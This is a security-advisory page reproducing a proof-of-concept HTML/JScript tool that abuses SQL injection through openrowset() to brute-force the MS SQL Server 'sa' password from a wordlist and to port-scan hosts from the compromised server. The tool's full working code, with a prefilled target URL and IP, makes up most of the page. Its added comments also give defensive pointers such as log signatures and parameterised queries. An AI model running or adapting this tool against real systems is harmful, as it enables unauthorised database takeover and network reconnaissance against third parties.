MS SQL Server Password Brute-Force via SQL Injection (PoC)

Summary

Credit:

The information has been provided by offtopic.
The original article can be found at: http://www.securitylab.ru/_tools/2005/05/sqlbrut.zip


Details

Based on the article linked in our previous article, Manipulating Microsoft SQL Server Using SQL Injection, the following tool uses SQL injection vulnerabilities to brute-force the MS SQL sa password.

Tool:
<!-- PoC front end. Both buttons drive synchronous requests from the browser
     through the JScript below; the < ***> marker in the base URL is the point
     where the injected SQL statement is spliced in. Tag brackets in this
     listing are rendered as "< tag>" (extraction artefact). -->
< html>
< h3>
MS SQL Server passwords bruteforce PoC via SQL Injection
< /h3>
(c)oded by Sergey V. Gordeychik 2005< br>
< a href=mailto: offtopic@mail.ru>offtopic@mail.ru< /a>
< hr>
< table>
< tr>
< td>
URL with injection:
< /td>
< td>
<!-- Injection URL; ‘< ***>’ is replaced by the openrowset() statement. -->
< input type=text Value=’http://200.4.4.106/inject.asp?id=1;< ***>’ id=baseurl>
< /td>
< tr>
< td>
Passwords file:
< /td>
< td>
<!-- Local file read line-by-line by brut() via Scripting.FileSystemObject. -->
< input type=text Value=’passwords.txt’ id=passwords>
< /td>
< /table>
<!-- brut(): one GET per candidate line, stops on the first response without ‘Login failed’. -->
< input type=button Value=’Start’ onclick=’brut();’>
< hr>
< h3>
Network port scanner via SQL Injection
< /h3>
< hr>
< table>
< tr>
< td>
Server:
< /td>
< td>
< input type=text Value=’200.4.4.6′ id=server>
< tr>
< td>
Port to scan:
< /td>
< td>
< input type=text Value=’445′ id=port>
< /table>
<!-- scan(): makes the target SQL Server open an outbound connection to server,port
     and classifies the result from the error text echoed back by the web app. -->
< input type=button Value=’Check’ onclick=’scan();’>
< hr>
<!-- Status/result sink; the script writes to it via innerHTML. -->
< a id=’status’>< /a>

< script language=’JScript’>

 // Shared MSXML request object (IE/ActiveX only). Every probe below is a
 // blocking, synchronous GET issued through it.
 var xmlhttp = new ActiveXObject(‘Msxml2.XMLHTTP’);
 // Injected statement template. openrowset() makes the *target* SQL Server open
 // a second connection (SQLOLEDB provider) to the server named ‘.’ as ‘sa’ with
 // password ‘pass’. ‘.’ and ‘pass’ are placeholders that scan() and checkpass()
 // swap in with String.replace (first occurrence only). The whole technique
 // depends on two things a defender can remove: ad hoc distributed queries
 // (openrowset) being enabled for the application's login, and database error
 // text being returned to the HTTP client.
 var inject = ‘select * from openrowset(‘SQLOLEDB’,’.’;’sa’;’pass’,’select 1′)’

  // Port probe. Builds a ‘host,port’ server name from the form fields, puts it
  // in place of the ‘.’ placeholder so the injected openrowset() forces the
  // SQL Server to connect out to that address, and classifies the host/port
  // purely from which error string the web application echoes back. The
  // verdict is written to the ‘status’ element; nothing is returned.
  // Each call is one synchronous GET whose query string carries the
  // openrowset/SQLOLEDB text — a distinctive token for web-server log review.
  function scan()
  {

    // replace() with a string pattern rewrites only the first ‘.’ in the
    // template, which is the server placeholder.
    var x,s = inject.replace(‘.’, document.getElementById(‘server’).value + ‘,’ + document.getElementById(‘port’).value);
    // Splice the statement into the user-supplied URL at the < ***> marker.
    s = document.getElementById(‘baseurl’).value.replace(‘< ***>’, s);
    xmlhttp.Open(‘GET’, s, false);
    xmlhttp.Send();
    x = xmlhttp.responseText;
    // Classification is driven entirely by verbose error text in the response.
    // If the application suppresses database error details, every outcome
    // falls through to ‘open’ and the probe learns nothing.
    if (x.indexOf(‘SQL Server does not exist’)>=1) s=’closed’; else
    if (x.indexOf(‘Timeout expired’)>=1) s=’filtered or unreachable’; else
    if (x.indexOf(‘Login failed’)>=1) s=’SQL Server detected.’; else s=’open’;
    document.getElementById(‘status’).innerHTML=’Scaned ‘ + document.getElementById(‘server’).value + ‘:’ + document.getElementById(‘port’).value + ‘.Port status:< b>’+s;

  }

  // Single credential probe.
  // @param url     injection URL containing the < ***> marker
  // @param passwd  candidate password substituted for the ‘pass’ placeholder
  // @returns 0 when the response contains ‘Login failed’ (the openrowset sa
  //   login was rejected), otherwise 1. Note that "otherwise" includes a
  //   generic error page, a timeout, or a blocked request, so a 1 here is a
  //   weak signal rather than proof of a valid password.
  function checkpass(url, passwd)
  {
    // The template holds ‘pass’ once; replace() rewrites that first occurrence.
    var s = inject.replace(‘pass’, passwd);
    s = url.replace(‘< ***>’, s);
    // Synchronous GET; the candidate travels in the URL query string.
    xmlhttp.Open(‘GET’, s, false);
    xmlhttp.Send();
    if (xmlhttp.responseText.indexOf(‘Login failed’)>=1) return 0; else
    {
    return 1;
    }
  }
  
  // Dictionary attack driver. Reads the local file named in the ‘passwords’
  // field one candidate per line (Scripting.FileSystemObject, IE/ActiveX only)
  // and issues one synchronous GET per line through checkpass(), stopping at
  // the first candidate whose response lacks ‘Login failed’. Progress is
  // written to the ‘status’ element every 10th attempt.
  // @returns 0 on a hit; falls off the end (undefined) when the file is
  //   exhausted. The file handle is never closed on either path.
  // Server-side this is N near-identical requests to one URL, each carrying
  // the openrowset/SQLOLEDB text with a different password — easy to spot in
  // access logs and to rate-limit. The root fix is the injection itself
  // (parameterised queries) plus not returning database error text.
  function brut()
  {
   document.getElementById(‘status’).innerHTML=’Starting…’;
   var fso, f, pass, baseurl, passwords, i
   fso = new ActiveXObject(‘Scripting.FileSystemObject’);
   baseurl=document.getElementById(‘baseurl’).value;
   passwords=document.getElementById(‘passwords’).value;
   // Mode 1 = ForReading.
   f = fso.OpenTextFile(passwords, 1);
   i = 0;
   while (!f.AtEndOfStream)
   {
    pass = f.ReadLine();
    i=i+1;
    // Status refresh only every 10th candidate (i % 10 === 0).
    if (!(i % 10))
    {
       document.getElementById(‘status’).innerHTML=’Trying password N’+i+’ < b>’+pass+'< /b>’;
    }
    // checkpass() returns 1 for any response without ‘Login failed’, so a
    // changed error page or a block page also ends the loop here.
    if (checkpass(baseurl, pass))
    {
      document.getElementById(‘status’).innerHTML=’SA password is ‘< b>’+pass+'< /b>’. Checked ‘+i+’ passwords’;
      return 0;
    };
   }
   document.getElementById(‘status’).innerHTML=’Ooopssss…. May be next time’;
  }
< /script>’
